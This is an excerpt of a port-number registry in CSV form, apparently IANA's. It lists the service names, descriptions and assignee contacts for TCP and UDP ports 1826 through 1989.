ardt,1826,tcp,ARDT,[Mike_Goddard],[Mike_Goddard],,,,,, ardt,1826,udp,ARDT,[Mike_Goddard],[Mike_Goddard],,,,,, asi,1827,tcp,ASI,[Bob_Tournoux],[Bob_Tournoux],,,,,, asi,1827,udp,ASI,[Bob_Tournoux],[Bob_Tournoux],,,,,, itm-mcell-u,1828,tcp,itm-mcell-u,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, itm-mcell-u,1828,udp,itm-mcell-u,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, optika-emedia,1829,tcp,Optika eMedia,[Daryle_DeBalski],[Daryle_DeBalski],,,,,, optika-emedia,1829,udp,Optika eMedia,[Daryle_DeBalski],[Daryle_DeBalski],,,,,, net8-cman,1830,tcp,Oracle Net8 CMan Admin,[Shuvayu_Kanjilal],[Shuvayu_Kanjilal],,,,,, net8-cman,1830,udp,Oracle Net8 CMan Admin,[Shuvayu_Kanjilal],[Shuvayu_Kanjilal],,,,,, myrtle,1831,tcp,Myrtle,[Ron_Achin],[Ron_Achin],,,,,, myrtle,1831,udp,Myrtle,[Ron_Achin],[Ron_Achin],,,,,, tht-treasure,1832,tcp,ThoughtTreasure,[Erik_Mueller],[Erik_Mueller],,,,,, tht-treasure,1832,udp,ThoughtTreasure,[Erik_Mueller],[Erik_Mueller],,,,,, udpradio,1833,tcp,udpradio,[Guus_Sliepen],[Guus_Sliepen],,,,,, udpradio,1833,udp,udpradio,[Guus_Sliepen],[Guus_Sliepen],,,,,, ardusuni,1834,tcp,ARDUS Unicast,,,,,,,, ardusuni,1834,udp,ARDUS Unicast,,,,,,,, ardusmul,1835,tcp,ARDUS Multicast,[Toshikatsu_Ito],[Toshikatsu_Ito],,,,,, ardusmul,1835,udp,ARDUS Multicast,[Toshikatsu_Ito],[Toshikatsu_Ito],,,,,, ste-smsc,1836,tcp,ste-smsc,[Tom_Snauwaert],[Tom_Snauwaert],,,,,, ste-smsc,1836,udp,ste-smsc,[Tom_Snauwaert],[Tom_Snauwaert],,,,,, csoft1,1837,tcp,csoft1,[John_Coll],[John_Coll],,,,,, csoft1,1837,udp,csoft1,[John_Coll],[John_Coll],,,,,, talnet,1838,tcp,TALNET,[Aaron_Lav],[Aaron_Lav],,,,,, talnet,1838,udp,TALNET,[Aaron_Lav],[Aaron_Lav],,,,,, netopia-vo1,1839,tcp,netopia-vo1,,,,,,,, netopia-vo1,1839,udp,netopia-vo1,,,,,,,, netopia-vo2,1840,tcp,netopia-vo2,,,,,,,, netopia-vo2,1840,udp,netopia-vo2,,,,,,,, netopia-vo3,1841,tcp,netopia-vo3,,,,,,,, netopia-vo3,1841,udp,netopia-vo3,,,,,,,, netopia-vo4,1842,tcp,netopia-vo4,,,,,,,, netopia-vo4,1842,udp,netopia-vo4,,,,,,,, netopia-vo5,1843,tcp,netopia-vo5,[Marc_Epard],[Marc_Epard],,,,,, netopia-vo5,1843,udp,netopia-vo5,[Marc_Epard],[Marc_Epard],,,,,, direcpc-dll,1844,tcp,DirecPC-DLL,[Chris_Kerrigan],[Chris_Kerrigan],,,,,, direcpc-dll,1844,udp,DirecPC-DLL,[Chris_Kerrigan],[Chris_Kerrigan],,,,,, altalink,1845,tcp,altalink,[Alberto_Raydan],[Alberto_Raydan],,,,,, altalink,1845,udp,altalink,[Alberto_Raydan],[Alberto_Raydan],,,,,, tunstall-pnc,1846,tcp,Tunstall PNC,[Robert_M_Moore],[Robert_M_Moore],,,,,, tunstall-pnc,1846,udp,Tunstall PNC,[Robert_M_Moore],[Robert_M_Moore],,,,,, slp-notify,1847,tcp,SLP Notification,,,,,[RFC3082],,, slp-notify,1847,udp,SLP Notification,,,,,[RFC3082],,, fjdocdist,1848,tcp,fjdocdist,[Yuichi_Ohiwa],[Yuichi_Ohiwa],,,,,, fjdocdist,1848,udp,fjdocdist,[Yuichi_Ohiwa],[Yuichi_Ohiwa],,,,,, alpha-sms,1849,tcp,ALPHA-SMS,[Benjamin_Grimm],[Benjamin_Grimm],,,,,, alpha-sms,1849,udp,ALPHA-SMS,[Benjamin_Grimm],[Benjamin_Grimm],,,,,, gsi,1850,tcp,GSI,[William_Mullaney],[William_Mullaney],,,,,, gsi,1850,udp,GSI,[William_Mullaney],[William_Mullaney],,,,,, ctcd,1851,tcp,ctcd,[John_Ryan],[John_Ryan],,,,,, ctcd,1851,udp,ctcd,[John_Ryan],[John_Ryan],,,,,, virtual-time,1852,tcp,Virtual Time,[Angie_S_Morner],[Angie_S_Morner],,,,,, virtual-time,1852,udp,Virtual Time,[Angie_S_Morner],[Angie_S_Morner],,,,,, vids-avtp,1853,tcp,VIDS-AVTP,[Sascha_Kuemmel],[Sascha_Kuemmel],,,,,, vids-avtp,1853,udp,VIDS-AVTP,[Sascha_Kuemmel],[Sascha_Kuemmel],,,,,, buddy-draw,1854,tcp,Buddy Draw,[Marvin_Shin],[Marvin_Shin],,,,,, buddy-draw,1854,udp,Buddy Draw,[Marvin_Shin],[Marvin_Shin],,,,,, fiorano-rtrsvc,1855,tcp,Fiorano RtrSvc,,,,,,,, fiorano-rtrsvc,1855,udp,Fiorano RtrSvc,,,,,,,, fiorano-msgsvc,1856,tcp,Fiorano MsgSvc,[Albert_Holt_2],[Albert_Holt_2],,,,,, fiorano-msgsvc,1856,udp,Fiorano MsgSvc,[Albert_Holt_2],[Albert_Holt_2],,,,,, datacaptor,1857,tcp,DataCaptor,[Steven_M_Forrester],[Steven_M_Forrester],,,,,, datacaptor,1857,udp,DataCaptor,[Steven_M_Forrester],[Steven_M_Forrester],,,,,, privateark,1858,tcp,PrivateArk,[Ronen_Zoran],[Ronen_Zoran],,,,,, privateark,1858,udp,PrivateArk,[Ronen_Zoran],[Ronen_Zoran],,,,,, gammafetchsvr,1859,tcp,Gamma Fetcher Server,[Cnaan_Aviv],[Cnaan_Aviv],,,,,, gammafetchsvr,1859,udp,Gamma Fetcher Server,[Cnaan_Aviv],[Cnaan_Aviv],,,,,, sunscalar-svc,1860,tcp,SunSCALAR Services,[Sanjay_Radia],[Sanjay_Radia],,,,,, sunscalar-svc,1860,udp,SunSCALAR Services,[Sanjay_Radia],[Sanjay_Radia],,,,,, lecroy-vicp,1861,tcp,LeCroy VICP,[Anthony_Cake],[Anthony_Cake],,,,,, lecroy-vicp,1861,udp,LeCroy VICP,[Anthony_Cake],[Anthony_Cake],,,,,, mysql-cm-agent,1862,tcp,MySQL Cluster Manager Agent,[Andrew_Morgan],[Andrew_Morgan],2009-12-08,,,,, mysql-cm-agent,1862,udp,MySQL Cluster Manager Agent,[Andrew_Morgan],[Andrew_Morgan],2009-12-08,,,,, msnp,1863,tcp,MSNP,[William_Lai],[William_Lai],,,,,, msnp,1863,udp,MSNP,[William_Lai],[William_Lai],,,,,, paradym-31port,1864,tcp,Paradym 31 Port,[David_Wooden],[David_Wooden],,,,,, paradym-31port,1864,udp,Paradym 31 Port,[David_Wooden],[David_Wooden],,,,,, entp,1865,tcp,ENTP,[Seiko_Epson],[Seiko_Epson],,,,,, entp,1865,udp,ENTP,[Seiko_Epson],[Seiko_Epson],,,,,, swrmi,1866,tcp,swrmi,[Jun_Yoshii],[Jun_Yoshii],,,,,, swrmi,1866,udp,swrmi,[Jun_Yoshii],[Jun_Yoshii],,,,,, udrive,1867,tcp,UDRIVE,[Robby_Walker],[Robby_Walker],,,,,, udrive,1867,udp,UDRIVE,[Robby_Walker],[Robby_Walker],,,,,, viziblebrowser,1868,tcp,VizibleBrowser,[Jimmy_Talbot],[Jimmy_Talbot],,,,,, viziblebrowser,1868,udp,VizibleBrowser,[Jimmy_Talbot],[Jimmy_Talbot],,,,,, transact,1869,tcp,TransAct,[TransAct_Futures_Dev],[TransAct_Futures_Dev],,,,,, transact,1869,udp,TransAct,[TransAct_Futures_Dev],[TransAct_Futures_Dev],,,,,, sunscalar-dns,1870,tcp,SunSCALAR DNS Service,[Sanjay_Radia],[Sanjay_Radia],,,,,, sunscalar-dns,1870,udp,SunSCALAR DNS Service,[Sanjay_Radia],[Sanjay_Radia],,,,,, canocentral0,1871,tcp,Cano Central 0,,,,,,,, canocentral0,1871,udp,Cano Central 0,,,,,,,, canocentral1,1872,tcp,Cano Central 1,[Mark_McNamara],[Mark_McNamara],,,,,, canocentral1,1872,udp,Cano Central 1,[Mark_McNamara],[Mark_McNamara],,,,,, fjmpjps,1873,tcp,Fjmpjps,,,,,,,, fjmpjps,1873,udp,Fjmpjps,,,,,,,, fjswapsnp,1874,tcp,Fjswapsnp,[Y_Ohiwa],[Y_Ohiwa],,,,,, fjswapsnp,1874,udp,Fjswapsnp,[Y_Ohiwa],[Y_Ohiwa],,,,,, westell-stats,1875,tcp,westell stats,[Thomas_McCabe],[Thomas_McCabe],,,,,, westell-stats,1875,udp,westell stats,[Thomas_McCabe],[Thomas_McCabe],,,,,, ewcappsrv,1876,tcp,ewcappsrv,[Howard_Yin],[Howard_Yin],,,,,, ewcappsrv,1876,udp,ewcappsrv,[Howard_Yin],[Howard_Yin],,,,,, hp-webqosdb,1877,tcp,hp-webqosdb,[Kim_Scott],[Kim_Scott],,,,,, hp-webqosdb,1877,udp,hp-webqosdb,[Kim_Scott],[Kim_Scott],,,,,, drmsmc,1878,tcp,drmsmc,[Katsuhiko_Abe],[Katsuhiko_Abe],,,,,, drmsmc,1878,udp,drmsmc,[Katsuhiko_Abe],[Katsuhiko_Abe],,,,,, nettgain-nms,1879,tcp,NettGain NMS,[Dr_Yair_Shapira],[Dr_Yair_Shapira],,,,,, nettgain-nms,1879,udp,NettGain NMS,[Dr_Yair_Shapira],[Dr_Yair_Shapira],,,,,, vsat-control,1880,tcp,Gilat VSAT Control,[Yariv_Kaplan],[Yariv_Kaplan],,,,,, vsat-control,1880,udp,Gilat VSAT Control,[Yariv_Kaplan],[Yariv_Kaplan],,,,,, ibm-mqseries2,1881,tcp,IBM WebSphere MQ Everyplace,[Jane_Porter],[Jane_Porter],,,,,, ibm-mqseries2,1881,udp,IBM WebSphere MQ Everyplace,[Jane_Porter],[Jane_Porter],,,,,, ecsqdmn,1882,tcp,CA eTrust Common Services,[Paul_Wissmiller],[Paul_Wissmiller],,,,,, ecsqdmn,1882,udp,CA eTrust Common Services,[Paul_Wissmiller],[Paul_Wissmiller],,,,,, ibm-mqisdp,1883,tcp,IBM MQSeries SCADA,[Andy_Stanford_Clark],[Andy_Stanford_Clark],,,,,, ibm-mqisdp,1883,udp,IBM MQSeries SCADA,[Andy_Stanford_Clark],[Andy_Stanford_Clark],,,,,, idmaps,1884,tcp,Internet Distance Map Svc,[Sugih_Jamim],[Sugih_Jamim],,,,,, idmaps,1884,udp,Internet Distance Map Svc,[Sugih_Jamim],[Sugih_Jamim],,,,,, vrtstrapserver,1885,tcp,Veritas Trap Server,[Russell_Thrasher],[Russell_Thrasher],,,,,, vrtstrapserver,1885,udp,Veritas Trap Server,[Russell_Thrasher],[Russell_Thrasher],,,,,, leoip,1886,tcp,Leonardo over IP,[Dietmar_Finkler],[Dietmar_Finkler],,,,,, leoip,1886,udp,Leonardo over IP,[Dietmar_Finkler],[Dietmar_Finkler],,,,,, filex-lport,1887,tcp,FileX Listening Port,[Megan_Woods],[Megan_Woods],,,,,, filex-lport,1887,udp,FileX Listening Port,[Megan_Woods],[Megan_Woods],,,,,, ncconfig,1888,tcp,NC Config Port,[Simon_Parker],[Simon_Parker],,,,,, ncconfig,1888,udp,NC Config Port,[Simon_Parker],[Simon_Parker],,,,,, unify-adapter,1889,tcp,Unify Web Adapter Service,[Daegis_Inc],[Chris_Anderson],,2012-07-31,,,, unify-adapter,1889,udp,Unify Web Adapter Service,[Daegis_Inc],[Chris_Anderson],,2012-07-31,,,, wilkenlistener,1890,tcp,wilkenListener,[Wilken_GmbH],[Wilken_GmbH],,,,,, wilkenlistener,1890,udp,wilkenListener,[Wilken_GmbH],[Wilken_GmbH],,,,,, childkey-notif,1891,tcp,ChildKey Notification,,,,,,,, childkey-notif,1891,udp,ChildKey Notification,,,,,,,, childkey-ctrl,1892,tcp,ChildKey Control,[Ivan_Berardinelli],[Ivan_Berardinelli],,,,,, childkey-ctrl,1892,udp,ChildKey Control,[Ivan_Berardinelli],[Ivan_Berardinelli],,,,,, elad,1893,tcp,ELAD Protocol,[Franco_Milan],[Franco_Milan],,,,,, elad,1893,udp,ELAD Protocol,[Franco_Milan],[Franco_Milan],,,,,, o2server-port,1894,tcp,O2Server Port,[Tim_Howard],[Tim_Howard],,,,,, o2server-port,1894,udp,O2Server Port,[Tim_Howard],[Tim_Howard],,,,,, ,1895,tcp,unassigned,,,,,,,,Microsoft (unoffically) using 1895 ,1895,udp,unassigned,,,,,,,,Microsoft (unoffically) using 1895 b-novative-ls,1896,tcp,b-novative license server,[Matthias_Riese],[Matthias_Riese],,,,,, b-novative-ls,1896,udp,b-novative license server,[Matthias_Riese],[Matthias_Riese],,,,,, metaagent,1897,tcp,MetaAgent,[Marie_France_Dubreui],[Marie_France_Dubreui],,,,,, metaagent,1897,udp,MetaAgent,[Marie_France_Dubreui],[Marie_France_Dubreui],,,,,, cymtec-port,1898,tcp,Cymtec secure management,[Michael_Mester],[Michael_Mester],,,,,, cymtec-port,1898,udp,Cymtec secure management,[Michael_Mester],[Michael_Mester],,,,,, mc2studios,1899,tcp,MC2Studios,[Michael_Coon],[Michael_Coon],,,,,, mc2studios,1899,udp,MC2Studios,[Michael_Coon],[Michael_Coon],,,,,, ssdp,1900,tcp,SSDP,[UPnP_Forum],[UPnP_Forum],,,,,, ssdp,1900,udp,SSDP,[UPnP_Forum],[UPnP_Forum],,,,,, fjicl-tep-a,1901,tcp,Fujitsu ICL Terminal Emulator Program A,[Bob_Lyon],[Bob_Lyon],,,,,, fjicl-tep-a,1901,udp,Fujitsu ICL Terminal Emulator Program A,[Bob_Lyon],[Bob_Lyon],,,,,, fjicl-tep-b,1902,tcp,Fujitsu ICL Terminal Emulator Program B,[Bob_Lyon],[Bob_Lyon],,,,,, fjicl-tep-b,1902,udp,Fujitsu ICL Terminal Emulator Program B,[Bob_Lyon],[Bob_Lyon],,,,,, linkname,1903,tcp,Local Link Name Resolution,[Dan_Harrington],[Dan_Harrington],,,,,, linkname,1903,udp,Local Link Name Resolution,[Dan_Harrington],[Dan_Harrington],,,,,, fjicl-tep-c,1904,tcp,Fujitsu ICL Terminal Emulator Program C,[Bob_Lyon],[Bob_Lyon],,,,,, fjicl-tep-c,1904,udp,Fujitsu ICL Terminal Emulator Program C,[Bob_Lyon],[Bob_Lyon],,,,,, sugp,1905,tcp,Secure UP.Link Gateway Protocol,[Peter_King],[Peter_King],,,,,, sugp,1905,udp,Secure UP.Link Gateway Protocol,[Peter_King],[Peter_King],,,,,, tpmd,1906,tcp,TPortMapperReq,[Sheila_Devins],[Sheila_Devins],,,,,, tpmd,1906,udp,TPortMapperReq,[Sheila_Devins],[Sheila_Devins],,,,,, intrastar,1907,tcp,IntraSTAR,[Peter_Schoenberger],[Peter_Schoenberger],,,,,, intrastar,1907,udp,IntraSTAR,[Peter_Schoenberger],[Peter_Schoenberger],,,,,, dawn,1908,tcp,Dawn,[Michael_Crawford_2],[Michael_Crawford_2],,,,,, dawn,1908,udp,Dawn,[Michael_Crawford_2],[Michael_Crawford_2],,,,,, global-wlink,1909,tcp,Global World Link,[Nicholas_Davies],[Nicholas_Davies],,,,,, global-wlink,1909,udp,Global World Link,[Nicholas_Davies],[Nicholas_Davies],,,,,, ultrabac,1910,tcp,UltraBac Software communications port,[Paul_Bunn],[Paul_Bunn],,,,,, ultrabac,1910,udp,UltraBac Software communications port,[Paul_Bunn],[Paul_Bunn],,,,,, mtp,1911,tcp,Starlight Networks Multimedia Transport Protocol,[Bruce_Lieberman],[Bruce_Lieberman],,,,,, mtp,1911,udp,Starlight Networks Multimedia Transport Protocol,[Bruce_Lieberman],[Bruce_Lieberman],,,,,, rhp-iibp,1912,tcp,rhp-iibp,[George_Nachman][Tom_Lake],[George_Nachman][Tom_Lake],,,,,, rhp-iibp,1912,udp,rhp-iibp,[George_Nachman][Tom_Lake],[George_Nachman][Tom_Lake],,,,,, armadp,1913,tcp,armadp,[Kevin_Welton],[Kevin_Welton],,,,,, armadp,1913,udp,armadp,[Kevin_Welton],[Kevin_Welton],,,,,, elm-momentum,1914,tcp,Elm-Momentum,[Willie_Wu],[Willie_Wu],,,,,, elm-momentum,1914,udp,Elm-Momentum,[Willie_Wu],[Willie_Wu],,,,,, facelink,1915,tcp,FACELINK,[J_H_Hermans],[J_H_Hermans],,,,,, facelink,1915,udp,FACELINK,[J_H_Hermans],[J_H_Hermans],,,,,, persona,1916,tcp,Persoft Persona,[Tom_Spidell],[Tom_Spidell],,,,,, persona,1916,udp,Persoft Persona,[Tom_Spidell],[Tom_Spidell],,,,,, noagent,1917,tcp,nOAgent,[Martin_Bestmann],[Martin_Bestmann],,,,,, noagent,1917,udp,nOAgent,[Martin_Bestmann],[Martin_Bestmann],,,,,, can-nds,1918,tcp,IBM Tivole Directory Service - NDS,,,,,,,, can-nds,1918,udp,IBM Tivole Directory Service - NDS,,,,,,,, can-dch,1919,tcp,IBM Tivoli Directory Service - DCH,,,,,,,, can-dch,1919,udp,IBM Tivoli Directory Service - DCH,,,,,,,, can-ferret,1920,tcp,IBM Tivoli Directory Service - FERRET,[Nic_Catrambone],[Nic_Catrambone],,,,,, can-ferret,1920,udp,IBM Tivoli Directory Service - FERRET,[Nic_Catrambone],[Nic_Catrambone],,,,,, noadmin,1921,tcp,NoAdmin,[Martin_Bestmann],[Martin_Bestmann],,,,,, noadmin,1921,udp,NoAdmin,[Martin_Bestmann],[Martin_Bestmann],,,,,, tapestry,1922,tcp,Tapestry,[Ken_Oliver],[Ken_Oliver],,,,,, tapestry,1922,udp,Tapestry,[Ken_Oliver],[Ken_Oliver],,,,,, spice,1923,tcp,SPICE,[Nicholas_Chua],[Nicholas_Chua],,,,,, spice,1923,udp,SPICE,[Nicholas_Chua],[Nicholas_Chua],,,,,, xiip,1924,tcp,XIIP,[Alain_Robert_2],[Alain_Robert_2],,,,,, xiip,1924,udp,XIIP,[Alain_Robert_2],[Alain_Robert_2],,,,,, discovery-port,1925,tcp,Surrogate Discovery Port,[Keith_Thompson],[Keith_Thompson],,,,,, discovery-port,1925,udp,Surrogate Discovery Port,[Keith_Thompson],[Keith_Thompson],,,,,, egs,1926,tcp,Evolution Game Server,[Simon_Butcher],[Simon_Butcher],,,,,, egs,1926,udp,Evolution Game Server,[Simon_Butcher],[Simon_Butcher],,,,,, videte-cipc,1927,tcp,Videte CIPC Port,[Videte_IT],[Videte_IT],,,,,, videte-cipc,1927,udp,Videte CIPC Port,[Videte_IT],[Videte_IT],,,,,, emsd-port,1928,tcp,Expnd Maui Srvr Dscovr,[Edo_Yahav],[Edo_Yahav],,,,,, emsd-port,1928,udp,Expnd Maui Srvr Dscovr,[Edo_Yahav],[Edo_Yahav],,,,,, bandwiz-system,1929,tcp,Bandwiz System - Server,[Joseph_Weihs],[Joseph_Weihs],,,,,, bandwiz-system,1929,udp,Bandwiz System - Server,[Joseph_Weihs],[Joseph_Weihs],,,,,, driveappserver,1930,tcp,Drive AppServer,[Andrew_Johnson],[Andrew_Johnson],,,,,, driveappserver,1930,udp,Drive AppServer,[Andrew_Johnson],[Andrew_Johnson],,,,,, amdsched,1931,tcp,AMD SCHED,[Michael_Walsh],[Michael_Walsh],,,,,, amdsched,1931,udp,AMD SCHED,[Michael_Walsh],[Michael_Walsh],,,,,, ctt-broker,1932,tcp,CTT Broker,[Jens_Edlund],[Jens_Edlund],,,,,, ctt-broker,1932,udp,CTT Broker,[Jens_Edlund],[Jens_Edlund],,,,,, xmapi,1933,tcp,IBM LM MT Agent,,,,,,,, xmapi,1933,udp,IBM LM MT Agent,,,,,,,, xaapi,1934,tcp,IBM LM Appl Agent,[Helga_Wolin],[Helga_Wolin],,,,,, xaapi,1934,udp,IBM LM Appl Agent,[Helga_Wolin],[Helga_Wolin],,,,,, macromedia-fcs,1935,tcp,Macromedia Flash Communications Server MX,[Pritham_Shetty],[Pritham_Shetty],,,,,, macromedia-fcs,1935,udp,Macromedia Flash Communications server MX,[Pritham_Shetty],[Pritham_Shetty],,,,,, jetcmeserver,1936,tcp,JetCmeServer Server Port,,,,,,,, jetcmeserver,1936,udp,JetCmeServer Server Port,,,,,,,, jwserver,1937,tcp,JetVWay Server Port,,,,,,,, jwserver,1937,udp,JetVWay Server Port,,,,,,,, jwclient,1938,tcp,JetVWay Client Port,,,,,,,, jwclient,1938,udp,JetVWay Client Port,,,,,,,, jvserver,1939,tcp,JetVision Server Port,,,,,,,, jvserver,1939,udp,JetVision Server Port,,,,,,,, jvclient,1940,tcp,JetVision Client Port,[Stephen_Tsun],[Stephen_Tsun],,,,,, jvclient,1940,udp,JetVision Client Port,[Stephen_Tsun],[Stephen_Tsun],,,,,, dic-aida,1941,tcp,DIC-Aida,[Frans_S_C_Witte],[Frans_S_C_Witte],,,,,, dic-aida,1941,udp,DIC-Aida,[Frans_S_C_Witte],[Frans_S_C_Witte],,,,,, res,1942,tcp,Real Enterprise Service,[Bob_Janssen],[Bob_Janssen],,,,,, res,1942,udp,Real Enterprise Service,[Bob_Janssen],[Bob_Janssen],,,,,, beeyond-media,1943,tcp,Beeyond Media,[Bob_Deblier],[Bob_Deblier],,,,,, beeyond-media,1943,udp,Beeyond Media,[Bob_Deblier],[Bob_Deblier],,,,,, close-combat,1944,tcp,close-combat,[David_Hua],[David_Hua],,,,,, close-combat,1944,udp,close-combat,[David_Hua],[David_Hua],,,,,, dialogic-elmd,1945,tcp,dialogic-elmd,[Roger_Kay],[Roger_Kay],,,,,, dialogic-elmd,1945,udp,dialogic-elmd,[Roger_Kay],[Roger_Kay],,,,,, tekpls,1946,tcp,tekpls,[Brian_Abramson_2],[Brian_Abramson_2],,,,,, tekpls,1946,udp,tekpls,[Brian_Abramson_2],[Brian_Abramson_2],,,,,, sentinelsrm,1947,tcp,SentinelSRM,[Michael_Zunke_2],[Michael_Zunke_2],2010-07-23,,,,, sentinelsrm,1947,udp,SentinelSRM,[Michael_Zunke_2],[Michael_Zunke_2],2010-07-23,,,,, eye2eye,1948,tcp,eye2eye,[Trevor_Bell],[Trevor_Bell],,,,,, eye2eye,1948,udp,eye2eye,[Trevor_Bell],[Trevor_Bell],,,,,, ismaeasdaqlive,1949,tcp,ISMA Easdaq Live,[Stephen_Dunne],[Stephen_Dunne],,,,,, ismaeasdaqlive,1949,udp,ISMA Easdaq Live,[Stephen_Dunne],[Stephen_Dunne],,,,,, ismaeasdaqtest,1950,tcp,ISMA Easdaq Test,[Stephen_Dunne],[Stephen_Dunne],,,,,, ismaeasdaqtest,1950,udp,ISMA Easdaq Test,[Stephen_Dunne],[Stephen_Dunne],,,,,, bcs-lmserver,1951,tcp,bcs-lmserver,[Andy_Warner],[Andy_Warner],,,,,, bcs-lmserver,1951,udp,bcs-lmserver,[Andy_Warner],[Andy_Warner],,,,,, mpnjsc,1952,tcp,mpnjsc,[Takenori_Miyahara],[Takenori_Miyahara],,,,,, mpnjsc,1952,udp,mpnjsc,[Takenori_Miyahara],[Takenori_Miyahara],,,,,, rapidbase,1953,tcp,Rapid Base,[Antoni_Wolski],[Antoni_Wolski],,,,,, rapidbase,1953,udp,Rapid Base,[Antoni_Wolski],[Antoni_Wolski],,,,,, abr-api,1954,tcp,ABR-API (diskbridge),,,,,,,, abr-api,1954,udp,ABR-API (diskbridge),,,,,,,, abr-secure,1955,tcp,ABR-Secure Data (diskbridge),[Graham_Wooden],[Graham_Wooden],,,,,, abr-secure,1955,udp,ABR-Secure Data (diskbridge),[Graham_Wooden],[Graham_Wooden],,,,,, vrtl-vmf-ds,1956,tcp,Vertel VMF DS,[Alan_Akahoshi],[Alan_Akahoshi],,,,,, vrtl-vmf-ds,1956,udp,Vertel VMF DS,[Alan_Akahoshi],[Alan_Akahoshi],,,,,, unix-status,1957,tcp,unix-status,[Thomas_Erskine],[Thomas_Erskine],,,,,, unix-status,1957,udp,unix-status,[Thomas_Erskine],[Thomas_Erskine],,,,,, dxadmind,1958,tcp,CA Administration Daemon,[John_Birrell],[John_Birrell],,,,,, dxadmind,1958,udp,CA Administration Daemon,[John_Birrell],[John_Birrell],,,,,, simp-all,1959,tcp,SIMP Channel,[Tim_Hunnewell],[Tim_Hunnewell],,,,,, simp-all,1959,udp,SIMP Channel,[Tim_Hunnewell],[Tim_Hunnewell],,,,,, nasmanager,1960,tcp,Merit DAC NASmanager,[Richard_S_Conto],[Richard_S_Conto],,,,,, nasmanager,1960,udp,Merit DAC NASmanager,[Richard_S_Conto],[Richard_S_Conto],,,,,, bts-appserver,1961,tcp,BTS APPSERVER,[Carl_Obsorn],[Carl_Obsorn],,,,,, bts-appserver,1961,udp,BTS APPSERVER,[Carl_Obsorn],[Carl_Obsorn],,,,,, biap-mp,1962,tcp,BIAP-MP,[Louis_Slothouber],[Louis_Slothouber],,,,,, biap-mp,1962,udp,BIAP-MP,[Louis_Slothouber],[Louis_Slothouber],,,,,, webmachine,1963,tcp,WebMachine,[Tim_Jowers],[Tim_Jowers],,,,,, webmachine,1963,udp,WebMachine,[Tim_Jowers],[Tim_Jowers],,,,,, solid-e-engine,1964,tcp,SOLID E ENGINE,[Ari_Valtanen],[Ari_Valtanen],,,,,, solid-e-engine,1964,udp,SOLID E ENGINE,[Ari_Valtanen],[Ari_Valtanen],,,,,, tivoli-npm,1965,tcp,Tivoli NPM,[Ivana_Cuozzo],[Ivana_Cuozzo],,,,,, tivoli-npm,1965,udp,Tivoli NPM,[Ivana_Cuozzo],[Ivana_Cuozzo],,,,,, slush,1966,tcp,Slush,[Damien_Miller],[Damien_Miller],,,,,, slush,1966,udp,Slush,[Damien_Miller],[Damien_Miller],,,,,, sns-quote,1967,tcp,SNS Quote,[Robert_Ellman],[Robert_Ellman],,,,,, sns-quote,1967,udp,SNS Quote,[Robert_Ellman],[Robert_Ellman],,,,,, lipsinc,1968,tcp,LIPSinc,,,,,,,, lipsinc,1968,udp,LIPSinc,,,,,,,, lipsinc1,1969,tcp,LIPSinc 1,[Robert_Armington],[Robert_Armington],,,,,, lipsinc1,1969,udp,LIPSinc 1,[Robert_Armington],[Robert_Armington],,,,,, netop-rc,1970,tcp,NetOp Remote Control,,,,,,,, netop-rc,1970,udp,NetOp Remote Control,,,,,,,, netop-school,1971,tcp,NetOp School,[NetOp_Technical_Supp],[NetOp_Technical_Supp],,,,,, netop-school,1971,udp,NetOp School,[NetOp_Technical_Supp],[NetOp_Technical_Supp],,,,,, intersys-cache,1972,tcp,Cache,[Mark_Hanson],[Mark_Hanson],,,,,, intersys-cache,1972,udp,Cache,[Mark_Hanson],[Mark_Hanson],,,,,, dlsrap,1973,tcp,Data Link Switching Remote Access Protocol,[Steve_T_Chiang],[Steve_T_Chiang],,,,,, dlsrap,1973,udp,Data Link Switching Remote Access Protocol,[Steve_T_Chiang],[Steve_T_Chiang],,,,,, drp,1974,tcp,DRP,[Richard_Alan_Johnson],[Richard_Alan_Johnson],,,,,, drp,1974,udp,DRP,[Richard_Alan_Johnson],[Richard_Alan_Johnson],,,,,, tcoflashagent,1975,tcp,TCO Flash Agent,,,,,,,, tcoflashagent,1975,udp,TCO Flash Agent,,,,,,,, tcoregagent,1976,tcp,TCO Reg Agent,,,,,,,, tcoregagent,1976,udp,TCO Reg Agent,,,,,,,, tcoaddressbook,1977,tcp,TCO Address Book,[Allan_Panitch],[Allan_Panitch],,,,,, tcoaddressbook,1977,udp,TCO Address Book,[Allan_Panitch],[Allan_Panitch],,,,,, unisql,1978,tcp,UniSQL,,,,,,,, unisql,1978,udp,UniSQL,,,,,,,, unisql-java,1979,tcp,UniSQL Java,[Keith_Yarbrough],[Keith_Yarbrough],,,,,, unisql-java,1979,udp,UniSQL Java,[Keith_Yarbrough],[Keith_Yarbrough],,,,,, pearldoc-xact,1980,tcp,PearlDoc XACT,[Chris_Vertonghen],[Chris_Vertonghen],,,,,, pearldoc-xact,1980,udp,PearlDoc XACT,[Chris_Vertonghen],[Chris_Vertonghen],,,,,, p2pq,1981,tcp,p2pQ,[Warren_Alexander],[Warren_Alexander],,,,,, p2pq,1981,udp,p2pQ,[Warren_Alexander],[Warren_Alexander],,,,,, estamp,1982,tcp,Evidentiary Timestamp,[Todd_Glassey],[Todd_Glassey],,,,,, estamp,1982,udp,Evidentiary Timestamp,[Todd_Glassey],[Todd_Glassey],,,,,, lhtp,1983,tcp,Loophole Test Protocol,[Kade_Hansson],[Kade_Hansson],,,,,, lhtp,1983,udp,Loophole Test Protocol,[Kade_Hansson],[Kade_Hansson],,,,,, bb,1984,tcp,BB,[Sean_MacGuire],[Sean_MacGuire],,,,,, bb,1984,udp,BB,[Sean_MacGuire],[Sean_MacGuire],,,,,, hsrp,1985,tcp,Hot Standby Router Protocol,,,,,[RFC2281],,, hsrp,1985,udp,Hot Standby Router Protocol,,,,,[RFC2281],,, licensedaemon,1986,tcp,cisco license management,,,,,,,, licensedaemon,1986,udp,cisco license management,,,,,,,, tr-rsrb-p1,1987,tcp,cisco RSRB Priority 1 port,,,,,,,, tr-rsrb-p1,1987,udp,cisco RSRB Priority 1 port,,,,,,,, tr-rsrb-p2,1988,tcp,cisco RSRB Priority 2 port,,,,,,,, tr-rsrb-p2,1988,udp,cisco RSRB Priority 2 port,,,,,,,, tr-rsrb-p3,1989,tcp,cisco RSRB Priority 3 port,,,,,,,, tr-rsrb-p3,1989,udp,cisco RSRB Priority 3 port,,,,,,,, mshnet,1989,tcp,MHSnet system,[Bob_Kummerfeld],[Bob_Kummerfeld],,,,,,This entry records an unassigned but widespread use mshnet,1989,udp,MHSnet system,[Bob_Kummerfeld],[Bob_Kummerfeld],,,,,,This entry records an unassigned but widespread use 